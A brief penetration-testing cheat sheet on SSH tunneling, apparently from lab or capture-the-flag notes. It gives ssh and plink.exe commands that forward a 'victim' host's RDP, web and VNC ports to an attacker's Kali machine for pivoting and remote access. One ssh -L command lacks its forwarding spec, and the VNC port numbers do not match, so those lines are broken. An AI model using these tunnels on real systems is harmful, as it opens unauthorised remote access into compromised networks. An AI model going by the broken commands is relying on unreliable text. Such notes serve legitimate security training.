SSH Tunneling

Normal port forwarding

To forward victim's port 80 to your local port 8181

ssh -L 8181:127.0.0.1:80 -N victim@10.10.10.111

Remote port forwarding

To forward port 80 to victim's machine local port 7777

ssh -R 7777:127.0.0.1:80 -N victim@10.10.10.111

#forward port 3389 to kali port 4000
plink.exe 10.11.0.69 -R 4000:127.0.0.1:3389

#forward port 80 to kali port 4001
plink.exe 10.11.0.69 -R 4001:127.0.0.1:80
plink.exe 10.11.0.69 -R 4000:10.1.1.230:3389

Port forward Victim VNC port to Attacking Kali

Victim have port 5901 listening locally

Port forward to kali

service ssh start 
ssh -L -N charix@10.10.10.84 

# connect to VNC port
vncviewer 127.0.0.1:5902 -passwd secretFile

Last updated